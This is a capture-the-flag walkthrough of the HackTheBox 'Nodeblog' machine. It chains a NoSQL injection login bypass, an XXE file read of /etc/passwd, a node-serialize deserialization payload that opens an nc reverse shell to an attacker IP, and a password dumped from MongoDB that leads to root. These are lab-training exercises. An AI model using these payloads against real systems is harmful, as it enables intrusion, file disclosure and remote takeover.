> For the complete documentation index, see [llms.txt](https://sayonara.gitbook.io/writeups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sayonara.gitbook.io/writeups/hackthebox/machines/nodeblog.md).

# Nodeblog

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FHvmIUkZ4aX4Q9l6VAxjn%2Fimage.png?alt=media&amp;token=c65696c7-c028-46c9-b8f9-25995f493a6e" alt=""><figcaption></figcaption></figure></div>

<mark style="color:green;">**NodeBlog**</mark> is an `Easy` Difficulty Linux machine. Initial exploitation relies on a `NoSQL authentication bypass`, enabling unauthenticated access to sensitive areas of the application. Following this, the box introduces a File Upload feature vulnerable to `XML External Entity` ( XXE ) attacks, which is leveraged to leak files, including the source code of the application. Analyzing the entry point in the source we code a `deserialization vulnerability` is identified, which can be exploited for remote code execution ( RCE ). Subsequently, the machine's user password is extracted from a `MongoDB shell`, which leads to `root privileges` on the machine.

## <mark style="color:red;">Reconaissance</mark>

### <mark style="color:blue;">nmap</mark>

As usual starting by scanning all the open ports and running services using nmap

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2Fo1T9Ij28egpbw5gVlHdc%2Fimage.png?alt=media&amp;token=2bbac1b7-8198-4c77-b389-92105c5d878d" alt=""><figcaption></figcaption></figure></div>

let's browse to the nodejs web application in port 5000

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2F2kWfqdXgL4sX750aguKG%2Fimage.png?alt=media&amp;token=98ea6011-eae4-4d69-a861-eb676e8621db" alt=""><figcaption></figcaption></figure></div>

and we see a login page, directory enumeration or virtual host fuzzing will not give any results so the only way that we have to take is to bypass the login page

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FTlNlwxUIAho2VDsm0O6O%2Fimage.png?alt=media&amp;token=9b1b1286-0a6a-4a26-986b-c73bb042b651" alt=""><figcaption></figcaption></figure></div>

if we enter invalid credentials we get invalid username so we can enumerate valid usernames

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FHpGrv2aRYh98izHNvnP0%2Fimage.png?alt=media&amp;token=308293f0-e162-47db-a411-f46b06f2a3a9" alt=""><figcaption></figcaption></figure></div>

if we enter admin as the username and a random password we get invalid password so admin is a valid username

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2F9uJP0DQNhOfZrcYgrSGJ%2Fimage.png?alt=media&amp;token=a8bda49f-0f94-4eef-904c-ba42e9ed2551" alt=""><figcaption></figcaption></figure></div>

testing for sqli will not make us bypass the login page

nodejs applications often uses nosql databases because it fits more with javascript so we can try to bypass the login using nosql injection payloads

let's intercept the request using burp and send it to repeater to try a couple of payloads that exist on payloadAllTheThings

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2F1c3ypJdfNkh3bvcMk0Wr%2Fimage.png?alt=media&amp;token=5e485689-3a10-43c0-8eb9-4dae8761fcc7" alt=""><figcaption></figcaption></figure></div>

to inject nosql payloads we have to change the content type to `application/json`&#x20;

```json
{"user": "admin", "password": {"$gt": ""}}
```

and we are in (we get a cookie in the response)

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FZhU9JKyue9vdapZOZJs7%2Fimage.png?alt=media&amp;token=edd5dc80-6f23-431d-9fd4-bd4c4a37a2cb" alt=""><figcaption></figcaption></figure></div>

if we decode the cookie as URL we get this

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FNF20En5RJt2RYPc0pCPp%2Fimage.png?alt=media&amp;token=68f1ae7b-0120-457b-ab0b-fd64549257be" alt=""><figcaption></figcaption></figure></div>

let click right on the response and click on **`show the response in browser`** and copy the link now browse using this link

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2Fb1yQmjmV93BHbn3i9uDg%2Fimage.png?alt=media&amp;token=38def97d-80ef-4bbc-bd56-e3c624f62e05" alt=""><figcaption></figcaption></figure></div>

but before doing anything we can do something benificial which is a useful file disclosure

if we send a bad json in the login request we get the web application source code location in the system

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FH3NQm0DmlBQyddW919kd%2Fimage.png?alt=media&amp;token=40362ae9-3b1d-47ac-bc99-48d5f80dfcb8" alt=""><figcaption></figcaption></figure></div>

now let's return to the application

the upload functionnality accepts xml files so let's try to do XXE Injection

let's create a xml file that contains only text and intercept the request using burp

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FAK0BX5sJNaK9Yu50kmHU%2Fimage.png?alt=media&amp;token=aaff50e8-0ee9-4f73-b14f-45e6b685b7af" alt=""><figcaption></figcaption></figure></div>

so they gave us an exmple of xml that we have to send

let's craft this xml to leak some files from the target system

```markup
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<post>
	<title>Example Post</title>
	<description>&xxe;</description>
	<markdown>Exemple Markdown</markdown>
</post>
```

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FwfoRBMn7NlVITHdGmCpz%2Fimage.png?alt=media&amp;token=8d5a13c7-b46f-4e2a-bff2-69e51fcaf2b3" alt=""><figcaption></figcaption></figure></div>

## <mark style="color:red;">Foothold</mark>

### <mark style="color:blue;">RCE through Node Deserialization Attack</mark>

we know the directory where the application source code is stored `/opt/blog` and in `nodejs` applications the `entry point` is usually either <mark style="color:yellow;">**main.js**</mark>, <mark style="color:yellow;">**index.js**</mark> or <mark style="color:yellow;">**server.js**</mark>

after testing all of those the entry point is in **`/opt/blog/server.js`**&#x20;

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FmLA8z0LhexQWAK406fCg%2Fimage.png?alt=media&amp;token=8d80022d-8a8e-4f4b-994b-bc4d8b1d701c" alt=""><figcaption></figcaption></figure></div>

after reading the source code we can see that it uses node-serialize library which is vulnerable to a deserialization vulnerability

Untrusted data (cookie in this case) passed into `unserialize()` function  in node-serialize module can be exploited to achieve arbitrary code execution by passing a serialized JavaScript Object with an Immediately invoked function expression (IIFE).

so we can pass in the cookie a serialized javascript object with an Immediately invoked function expression (IIFE) to get RCE.

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2Fyo9H6hMBx6o617VYisQG%2Fimage.png?alt=media&amp;token=f31c2b60-695e-4f71-98b5-fbb8b2802c27" alt=""><figcaption></figcaption></figure></div>

to understand how you can exploit this vulnerability visit this link :&#x20;

{% embed url="<https://exploit-notes.hdks.org/exploit/web/security-risk/nodejs-deserialization-attack/>" %}

this is the exploit we are going to use get RCE

```javascript
{"rce":"_$$ND_FUNC$$_function (){require('child_process').exec('rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.177 1234 >/tmp/f',function(error, stdout, stderr) { console.log(stdout) });}()"}
```

we will put this in the cookie and encode it as URL&#x20;

before sending the request setup a listener on the port you have specified in the exploit&#x20;

let's copy the url encoded exploit and paste it in the cookie

before we send it let's setup a listener at port 1234

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FBYXAEFXMRfmNyzjuP7gn%2Fimage.png?alt=media&amp;token=fcc87229-f353-450a-a92d-578e05028586" alt=""><figcaption></figcaption></figure></div>

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FBjGtnFT0cBRVPXBKV9Y9%2Fimage.png?alt=media&amp;token=1031d160-07cf-4788-9284-44f122de6639" alt=""><figcaption></figcaption></figure></div>

encode it as url&#x20;

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2Fv8hqD00srLdKGPUQdbTx%2Fimage.png?alt=media&amp;token=7b9d6639-a335-4fcf-89bf-5448a46da74e" alt=""><figcaption></figcaption></figure></div>

send the request and we get a reverse shell as admin

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FAiEel0j7xW7B6y1L3zBf%2Fimage.png?alt=media&amp;token=8b479db5-3e2d-4d85-ba4a-272ee5361a43" alt=""><figcaption></figcaption></figure></div>

**Upgrading dumb shell :**&#x20;

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2Fab1SZFq2tviC9rlSBVbt%2Fimage.png?alt=media&amp;token=5e31bd13-911e-4e6a-b61d-3f907bdc5caa" alt=""><figcaption></figcaption></figure></div>

you can view the user.txt flag at `/home/admin`&#x20;

## <mark style="color:red;">Privilege Escalation</mark>

### <mark style="color:blue;">Enumeration</mark>

let's explore the sudo rights of the user admin, unfortuanately we need the admin password

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FvqB9E8Xdu0j1G4uqcFj8%2Fimage.png?alt=media&amp;token=80be5aa8-7f1a-4960-aa19-7df28752a8b8" alt=""><figcaption></figcaption></figure></div>

now if we look at the processes running in the target machine we will find mongo database running as a service

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FgBUuvP4EY5vaFOtRhGO6%2Fimage.png?alt=media&amp;token=fc566de6-de95-44f1-9ef1-c458228576b2" alt=""><figcaption></figcaption></figure></div>

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FoF4zRT71OsurUYNe9aLL%2Fimage.png?alt=media&amp;token=9afd806b-bb2b-4ed2-9631-6321e0a5e36e" alt=""><figcaption></figcaption></figure></div>

so let's try to access the mongo database locally using the command `mongo`

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FKaE4iHWudZERW3Wka6D9%2Fimage.png?alt=media&amp;token=14f542d8-79da-4be6-bf39-3339cc9e4219" alt=""><figcaption></figcaption></figure></div>

showing all databases using the command `show dbs`&#x20;

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FWWegag1ZimheW27GPKnZ%2Fimage.png?alt=media&amp;token=05698886-de81-46bb-9a3f-fc8c6135cc38" alt=""><figcaption></figcaption></figure></div>

Of the listed ones, the only non-default one is `blog` , which we proceed to enumerate

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2F4cgvFkTardEN1Nfnz3KW%2Fimage.png?alt=media&amp;token=e42332bf-43b9-4937-88a4-5cc2838c05e3" alt=""><figcaption></figcaption></figure></div>

in mongodb databases contains collections

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FCxJDYNSwWIbXN8VflONX%2Fimage.png?alt=media&amp;token=e2ab9597-61bd-463e-9481-aea916891749" alt=""><figcaption></figcaption></figure></div>

We find two collections, the latter of which, namely users is of primary interest as it might contain credentials. We proceed to dump its contents

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FWjyVG8cU93gbX9zoha2p%2Fimage.png?alt=media&amp;token=5f9898fa-a216-4cf7-8dba-a32bd07383ea" alt=""><figcaption></figcaption></figure></div>

so the admin's password is **IppsecSaysPleaseSubscribe**

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FuQE0bdex7mzeDTVuBhfN%2Fimage.png?alt=media&amp;token=7c820f24-b9dd-4afb-b1f2-b7097b876ae3" alt=""><figcaption></figcaption></figure></div>

so let's use sudo to become root because we have full sudo privileges

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FHZD21EjnlqBaiFCqMdkf%2Fimage.png?alt=media&amp;token=885b169d-f85e-4853-b6b6-45c6925e124c" alt=""><figcaption></figcaption></figure></div>

<div align="left"><figure><img src="https://1410593648-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FYI2noEqPw69jd0hR7Prp%2Fuploads%2FYj40IS2dIuvmYyckEQpD%2Fimage.png?alt=media&amp;token=98aa222f-ecad-4436-b6b1-5a8427a4b76c" alt=""><figcaption></figcaption></figure></div>

hope you found this walkthrough easy to understand and follow

Greeting From [<mark style="color:red;">**Sayonara**</mark>](https://github.com/ismail-arame)
